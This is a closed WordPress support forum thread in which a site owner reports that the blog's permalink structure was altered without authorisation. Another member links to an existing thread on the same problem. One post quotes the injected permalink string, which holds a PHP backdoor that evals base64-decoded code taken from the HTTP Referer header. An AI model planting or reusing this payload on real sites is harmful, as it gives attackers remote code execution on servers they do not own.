WordPress.org

Ready to get started?Download WordPress

Forums

[closed] My Permalinks changed, hacked? (4 posts)

  1. netslacker
    Member
    Posted 4 years ago #

    I went to visit my site tonight and got a "Bad Request" error attempting to access ANY page from the homepage.

    Upon further inspection I found that there was a VERY weird permalink structure in every link. It was something like:

    /2009/09/03/{__eval('appchatter.com')__}/post-tile-here/

    it wasn't exactly like that, I didn't bother grabbing the link structure. However, I immediately went in and checked the permalink setting and it had changed. So I just simply clicked it back to the "/month/title/" setting that I've always used. However, prior to changing it back it was set to a custom permalink that was NOT even close to being what I had setup.

    Luckily the site was only down for about an hour before I noticed it, but this one is REALLY odd. None of us have logged into the site since early this morning and our visit count is only down during the hour prior to the link change discovery.

    I'm wondering if this is a known security vulnerability?? Can this be changed by someone crafting a URL and just hitting the site? or ...?

    I'm running 2.7.1.

  2. UseShots
    Member
    Posted 4 years ago #

    Really strange.

    Here is a topic with similar problem (eval code in permalinks)
    http://wordpress.org/support/topic/307518

    Please, post updates here if you manage to find out what caused such strange permalinks

  3. netslacker
    Member
    Posted 4 years ago #

    The problem keeps returning.

    /%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

    ends up in the permalink structure.

  4. Roy
    Member
    Posted 4 years ago #

    Join the club.
    Wouldn't it be better to make just one thread about this subject instead of four?
    http://wordpress.org/support/topic/307518?replies=16
    You already replied there. Read the thread and try the tips first.

Topic Closed

This topic has been closed to new replies.

About this Topic